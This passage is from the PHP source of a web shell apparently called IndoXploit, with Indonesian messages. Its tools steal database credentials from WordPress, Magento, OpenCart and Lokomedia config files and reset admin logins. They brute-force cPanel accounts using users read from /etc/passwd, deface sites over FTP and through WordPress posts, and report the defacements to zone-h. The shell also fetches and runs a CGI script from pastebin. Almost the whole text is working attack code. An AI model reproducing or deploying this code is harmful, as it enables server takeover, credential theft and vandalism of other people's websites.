786. $dbhost = ambilkata($config,"DB_HOST', '","'");
787. $dbuser = ambilkata($config,"DB_USER', '","'");
788. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
789. $dbname = ambilkata($config,"DB_NAME', '","'");
790. $dbprefix = ambilkata($config,"table_prefix = '","'");
791. $prefix = $dbprefix."users";
792. $option = $dbprefix."options";
793. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
794. $db = mysql_select_db($dbname);
795. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
796. $result = mysql_fetch_array($q);
797. $id = $result[ID];
798. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
799. $result2 = mysql_fetch_array($q2);
800. $target = $result2[option_value];
801. if($target == '') {
802. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
803. } else {
804. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
805. }
806. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
807. echo "Config => ".$file_conf."<br>";
808. echo "CMS => Wordpress<br>";
809. echo $url_target;
810. if(!$update OR !$conn OR !$db) {
811. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
812. } else {
813. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
814. }
815. mysql_close($conn);
816. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
817. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
818. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
819. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
820. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
821. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
822. $prefix = $dbprefix."admin_user";
823. $option = $dbprefix."core_config_data";
824. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
825. $db = mysql_select_db($dbname);
826. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
827. $result = mysql_fetch_array($q);
828. $id = $result[user_id];
829. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
830. $result2 = mysql_fetch_array($q2);
831. $target = $result2[value];
832. if($target == '') {
833. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
834. } else {
835. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
836. }
837. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
838. echo "Config => ".$file_conf."<br>";
839. echo "CMS => Magento<br>";
840. echo $url_target;
841. if(!$update OR !$conn OR !$db) {
842. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
843. } else {
844. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
845. }
846. mysql_close($conn);
847. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
848. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
849. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
850. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
851. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
852. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
853. $prefix = $dbprefix."user";
854. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
855. $db = mysql_select_db($dbname);
856. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
857. $result = mysql_fetch_array($q);
858. $id = $result[user_id];
859. $target = ambilkata($config,"HTTP_SERVER', '","'");
860. if($target == '') {
861. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
862. } else {
863. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
864. }
865. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
866. echo "Config => ".$file_conf."<br>";
867. echo "CMS => OpenCart<br>";
868. echo $url_target;
869. if(!$update OR !$conn OR !$db) {
870. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
871. } else {
872. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
873. }
874. mysql_close($conn);
875. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
876. $dbhost = ambilkata($config,'server = "','"');
877. $dbuser = ambilkata($config,'username = "','"');
878. $dbpass = ambilkata($config,'password = "','"');
879. $dbname = ambilkata($config,'database = "','"');
880. $prefix = "users";
881. $option = "identitas";
882. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
883. $db = mysql_select_db($dbname);
884. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
885. $result = mysql_fetch_array($q);
886. $target = $result[alamat_website];
887. if($target == '') {
888. $target2 = $result[url];
889. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
890. if($target2 == '') {
891. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
892. } else {
893. $cek_login3 = file_get_contents("$target2/adminweb/");
894. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
895. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
896. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
897. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
898. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
899. } else {
900. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
901. }
902. }
903. } else {
904. $cek_login = file_get_contents("$target/adminweb/");
905. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
906. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
907. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
908. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
909. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
910. } else {
911. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
912. }
913. }
914. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
915. echo "Config => ".$file_conf."<br>";
916. echo "CMS => Lokomedia<br>";
917. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
918. echo $url_target2;
919. } else {
920. echo $url_target;
921. }
922. if(!$update OR !$conn OR !$db) {
923. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
924. } else {
925. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
926. }
927. mysql_close($conn);
928. }
929. }
930. }
931. } else {
932. echo "<center>
933. <h1>Auto Edit User Config</h1>
934. <form method='post'>
935. DIR Config: <br>
936. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
937. Set User & Pass: <br>
938. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
939. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
940. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
941. </form>
942. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
943. ";
944. }
945. } elseif($_GET['do'] == 'cpanel') {
946. if($_POST['crack']) {
947. $usercp = explode("\r\n", $_POST['user_cp']);
948. $passcp = explode("\r\n", $_POST['pass_cp']);
949. $i = 0;
950. foreach($usercp as $ucp) {
951. foreach($passcp as $pcp) {
952. if(@mysql_connect('localhost', $ucp, $pcp)) {
953. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
954. } else {
955. $_SESSION[$ucp] = "1";
956. $_SESSION[$pcp] = "1";
957. if($ucp == '' || $pcp == '') {
958.  
959. } else {
960. $i++;
961. if(function_exists('posix_getpwuid')) {
962. $domain_cp = file_get_contents("/etc/named.conf");
963. if($domain_cp == '') {
964. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
965. } else {
966. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
967. foreach($domains_cp[1] as $dj) {
968. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
969. $user_cp_url = $user_cp_url['name'];
970. if($user_cp_url == $ucp) {
971. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
972. break;
973. }
974. }
975. }
976. } else {
977. $dom = "<font color=red>function is Disable by system</font>";
978. }
979. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
980. }
981. }
982. }
983. }
984. }
985. if($i == 0) {
986. } else {
987. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
988. }
989. } else {
990. echo "<center>
991. <form method='post'>
992. USER: <br>
993. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
994. $_usercp = fopen("/etc/passwd","r");
995. while($getu = fgets($_usercp)) {
996. if($getu == '' || !$_usercp) {
997. echo "<font color=red>Can't read /etc/passwd</font>";
998. } else {
999. preg_match_all("/(.*?):x:/", $getu, $u);
1000. foreach($u[1] as $user_cp) {
1001. if(is_dir("/home/$user_cp/public_html")) {
1002. echo "$user_cp\n";
1003. }
1004. }
1005. }
1006. }
1007. echo "</textarea><br>
1008. PASS: <br>
1009. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1010. function cp_pass($dir) {
1011. $pass = "";
1012. $dira = scandir($dir);
1013. foreach($dira as $dirb) {
1014. if(!is_file("$dir/$dirb")) continue;
1015. $ambil = file_get_contents("$dir/$dirb");
1016. if(preg_match("/WordPress/", $ambil)) {
1017. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1018. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1019. $pass .= ambilkata($ambil,"password = '","'")."\n";
1020. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1021. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1022. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1023. $pass .= ambilkata($ambil,'password = "','"')."\n";
1024. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1025. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1026. } elseif(preg_match("/^[client]$/", $ambil)) {
1027. preg_match("/password=(.*?)/", $ambil, $pass1);
1028. if(preg_match('/"/', $pass1[1])) {
1029. $pass1[1] = str_replace('"', "", $pass1[1]);
1030. $pass .= $pass1[1]."\n";
1031. } else {
1032. $pass .= $pass1[1]."\n";
1033. }
1034. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1035. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1036. }
1037. }
1038. echo $pass;
1039. }
1040. $cp_pass = cp_pass($dir);
1041. echo $cp_pass;
1042. echo "</textarea><br>
1043. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1044. </form>
1045. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1046. }
1047. } elseif($_GET['do'] == 'cpftp_auto') {
1048. if($_POST['crack']) {
1049. $usercp = explode("\r\n", $_POST['user_cp']);
1050. $passcp = explode("\r\n", $_POST['pass_cp']);
1051. $i = 0;
1052. foreach($usercp as $ucp) {
1053. foreach($passcp as $pcp) {
1054. if(@mysql_connect('localhost', $ucp, $pcp)) {
1055. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1056. } else {
1057. $_SESSION[$ucp] = "1";
1058. $_SESSION[$pcp] = "1";
1059. if($ucp == '' || $pcp == '') {
1060. //
1061. } else {
1062. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1063. $ftp_conn = ftp_connect($ip);
1064. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1065. if((!$ftp_login) || (!$ftp_conn)) {
1066. echo "[+] <font color=red>Login Gagal</font><br><br>";
1067. } else {
1068. echo "[+] <font color=lime>Login Sukses</font><br>";
1069. $fi = htmlspecialchars($_POST['file_deface']);
1070. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1071. if($deface) {
1072. $i++;
1073. echo "[+] <font color=lime>Deface Sukses</font><br>";
1074. if(function_exists('posix_getpwuid')) {
1075. $domain_cp = file_get_contents("/etc/named.conf");
1076. if($domain_cp == '') {
1077. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1078. } else {
1079. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1080. foreach($domains_cp[1] as $dj) {
1081. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1082. $user_cp_url = $user_cp_url['name'];
1083. if($user_cp_url == $ucp) {
1084. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1085. break;
1086. }
1087. }
1088. }
1089. } else {
1090. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1091. }
1092. } else {
1093. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1094. }
1095. }
1096. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1097. }
1098. }
1099. }
1100. }
1101. }
1102. if($i == 0) {
1103. } else {
1104. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1105. }
1106. } else {
1107. echo "<center>
1108. <form method='post'>
1109. Filename: <br>
1110. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1111. Deface Page: <br>
1112. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1113. USER: <br>
1114. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1115. $_usercp = fopen("/etc/passwd","r");
1116. while($getu = fgets($_usercp)) {
1117. if($getu == '' || !$_usercp) {
1118. echo "<font color=red>Can't read /etc/passwd</font>";
1119. } else {
1120. preg_match_all("/(.*?):x:/", $getu, $u);
1121. foreach($u[1] as $user_cp) {
1122. if(is_dir("/home/$user_cp/public_html")) {
1123. echo "$user_cp\n";
1124. }
1125. }
1126. }
1127. }
1128. echo "</textarea><br>
1129. PASS: <br>
1130. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1131. function cp_pass($dir) {
1132. $pass = "";
1133. $dira = scandir($dir);
1134. foreach($dira as $dirb) {
1135. if(!is_file("$dir/$dirb")) continue;
1136. $ambil = file_get_contents("$dir/$dirb");
1137. if(preg_match("/WordPress/", $ambil)) {
1138. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1139. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1140. $pass .= ambilkata($ambil,"password = '","'")."\n";
1141. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1142. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1143. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1144. $pass .= ambilkata($ambil,'password = "','"')."\n";
1145. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1146. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1147. } elseif(preg_match("/client/", $ambil)) {
1148. preg_match("/password=(.*)/", $ambil, $pass1);
1149. if(preg_match('/"/', $pass1[1])) {
1150. $pass1[1] = str_replace('"', "", $pass1[1]);
1151. $pass .= $pass1[1]."\n";
1152. }
1153. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1154. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1155. }
1156. }
1157. echo $pass;
1158. }
1159. $cp_pass = cp_pass($dir);
1160. echo $cp_pass;
1161. echo "</textarea><br>
1162. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1163. </form>
1164. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1165. }
1166. } elseif($_GET['do'] == 'smtp') {
1167. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1168. function scj($dir) {
1169. $dira = scandir($dir);
1170. foreach($dira as $dirb) {
1171. if(!is_file("$dir/$dirb")) continue;
1172. $ambil = file_get_contents("$dir/$dirb");
1173. $ambil = str_replace("$", "", $ambil);
1174. if(preg_match("/JConfig|joomla/", $ambil)) {
1175. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1176. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1177. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1178. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1179. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1180. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1181. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1182. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1183. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1184. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1185. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1186. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1187. }
1188. }
1189. }
1190. $smpt_hunter = scj($dir);
1191. echo $smpt_hunter;
1192. } elseif($_GET['do'] == 'auto_wp') {
1193. if($_POST['hajar']) {
1194. $title = htmlspecialchars($_POST['new_title']);
1195. $pn_title = str_replace(" ", "-", $title);
1196. if($_POST['cek_edit'] == "Y") {
1197. $script = $_POST['edit_content'];
1198. } else {
1199. $script = $title;
1200. }
1201. $conf = $_POST['config_dir'];
1202. $scan_conf = scandir($conf);
1203. foreach($scan_conf as $file_conf) {
1204. if(!is_file("$conf/$file_conf")) continue;
1205. $config = file_get_contents("$conf/$file_conf");
1206. if(preg_match("/WordPress/", $config)) {
1207. $dbhost = ambilkata($config,"DB_HOST', '","'");
1208. $dbuser = ambilkata($config,"DB_USER', '","'");
1209. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1210. $dbname = ambilkata($config,"DB_NAME', '","'");
1211. $dbprefix = ambilkata($config,"table_prefix = '","'");
1212. $prefix = $dbprefix."posts";
1213. $option = $dbprefix."options";
1214. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1215. $db = mysql_select_db($dbname);
1216. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1217. $result = mysql_fetch_array($q);
1218. $id = $result[ID];
1219. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1220. $result2 = mysql_fetch_array($q2);
1221. $target = $result2[option_value];
1222. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1223. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1224. echo "<div style='margin: 5px auto;'>";
1225. if($target == '') {
1226. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1227. } else {
1228. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1229. }
1230. if(!$update OR !$conn OR !$db) {
1231. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1232. } else {
1233. echo "<font color=lime>sukses di ganti.</font><br>";
1234. }
1235. echo "</div>";
1236. mysql_close($conn);
1237. }
1238. }
1239. } else {
1240. echo "<center>
1241. <h1>Auto Edit Title+Content WordPress</h1>
1242. <form method='post'>
1243. DIR Config: <br>
1244. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1245. Set Title: <br>
1246. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1247. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1248. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1249. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1250. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1251. </form>
1252. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1253. ";
1254. }
1255. } elseif($_GET['do'] == 'zoneh') {
1256. if($_POST['submit']) {
1257. $domain = explode("\r\n", $_POST['url']);
1258. $nick = $_POST['nick'];
1259. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1260. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1261. function zoneh($url,$nick) {
1262. $ch = curl_init("http://www.zone-h.com/notify/single");
1263. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1264. curl_setopt($ch, CURLOPT_POST, true);
1265. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1266. return curl_exec($ch);
1267. curl_close($ch);
1268. }
1269. foreach($domain as $url) {
1270. $zoneh = zoneh($url,$nick);
1271. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1272. echo "$url -> <font color=lime>OK</font><br>";
1273. } else {
1274. echo "$url -> <font color=red>ERROR</font><br>";
1275. }
1276. }
1277. } else {
1278. echo "<center><form method='post'>
1279. <u>Defacer</u>: <br>
1280. <input type='text' name='nick' size='50' value='0xCor3'><br>
1281. <u>Domains</u>: <br>
1282. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1283. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1284. </form>";
1285. }
1286. echo "</center>";
1287. } elseif($_GET['do'] == 'cgi') {
1288. $cgi_dir = mkdir('idx_cgi', 0755);
1289. $file_cgi = "idx_cgi/cgi.izo";
1290. $isi_htcgi = "AddHandler cgi-script .izo";
1291. $htcgi = fopen(".htaccess", "w");
1292. fwrite($htcgi, $isi_htcgi);
1293. fclose($htcgi);
1294. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1295. $cgi = fopen($file_cgi, "w");
1296. fwrite($cgi, $cgi_script);
1297. fclose($cgi);
1298. chmod($file_cgi, 0755);
1299. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1300. } elseif($_GET['do'] == 'fake_root') {
1301. ob_start();
1302. $cwd = getcwd();
1303. $ambil_user = explode("/", $cwd);
1304. $user = $ambil_user[2];
1305. if($_POST['reverse']) {
1306. $site = explode("\r\n", $_POST['url']);
1307. $file = $_POST['file'];
1308. foreach($site as $url) {
1309. $cek = getsource("$url/~$user/$file");
1310. if(preg_match("/hacked/i", $cek)) {
1311. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1312. }
1313. }
1314. } else {
1315. echo "<center><form method='post'>
1316. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1317. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1318. Domain: <br>
1319. <textarea style='width: 450px; height: 250px;' name='url'>";
1320. reverse($_SERVER['HTTP_HOST']);
1321. echo "</textarea><br>
1322. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1323. </form><br>
1324. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1325. }
1326. } elseif($_GET['do'] == 'adminer') {
1327. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1328. function adminer($url, $isi) {
1329. $fp = fopen($isi, "w");
1330. $ch = curl_init();
1331. curl_setopt($ch, CURLOPT_URL, $url);
1332. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1333. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1334. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1335. curl_setopt($ch, CURLOPT_FILE, $fp);
1336. return curl_exec($ch);
1337. curl_close($ch);
1338. fclose($fp);
1339. ob_flush();
1340. flush();
1341. }
1342. if(file_exists('adminer.php')) {
1343. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1344. } else {
1345. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1346. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1347. } else {
1348. echo "<center><font color=red>gagal buat file adminer</font></center>";
1349. }
1350. }
1351. } elseif($_GET['do'] == 'auto_dwp') {
1352. if($_POST['auto_deface_wp']) {
1353. function anucurl($sites) {
1354. $ch = curl_init($sites);
1355. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1356. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1357. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1358. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1359. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1360. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1361. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1362. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1363. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1364. $data = curl_exec($ch);
1365. curl_close($ch);
1366. return $data;
1367. }
1368. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1369. $post = array(
1370. "log" => "$userr",
1371. "pwd" => "$pass",
1372. "rememberme" => "forever",
1373. "wp-submit" => "$wp_submit",
1374. "redirect_to" => "$web",
1375. "testcookie" => "1",
1376. );
1377. $ch = curl_init($cek);
1378. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1379. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1380. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1381. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1382. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1383. curl_setopt($ch, CURLOPT_POST, 1);
1384. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1385. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1386. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1387. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1388. $data = curl_exec($ch);
1389. curl_close($ch);
1390. return $data;
1391. }
1392. $scan = $_POST['link_config'];
1393. $link_config = scandir($scan);
1394. $script = htmlspecialchars($_POST['script']);
1395. $user = "indoxploit";
1396. $pass = "indoxploit";
1397. $passx = md5($pass);
1398. foreach($link_config as $dir_config) {
1399. if(!is_file("$scan/$dir_config")) continue;
1400. $config = file_get_contents("$scan/$dir_config");
1401. if(preg_match("/WordPress/", $config)) {
1402. $dbhost = ambilkata($config,"DB_HOST', '","'");
1403. $dbuser = ambilkata($config,"DB_USER', '","'");
1404. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1405. $dbname = ambilkata($config,"DB_NAME', '","'");
1406. $dbprefix = ambilkata($config,"table_prefix = '","'");
1407. $prefix = $dbprefix."users";
1408. $option = $dbprefix."options";
1409. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1410. $db = mysql_select_db($dbname);
1411. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1412. $result = mysql_fetch_array($q);
1413. $id = $result[ID];
1414. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1415. $result2 = mysql_fetch_array($q2);
1416. $target = $result2[option_value];
1417. if($target == '') {
1418. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1419. } else {
1420. echo "[+] $target <br>";
1421. }
1422. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1423. if(!$conn OR !$db OR !$update) {
1424. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1425. mysql_close($conn);
1426. } else {
1427. $site = "$target/wp-login.php";
1428. $site2 = "$target/wp-admin/theme-install.php?upload";
1429. $b1 = anucurl($site2);
1430. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1431. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1432. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
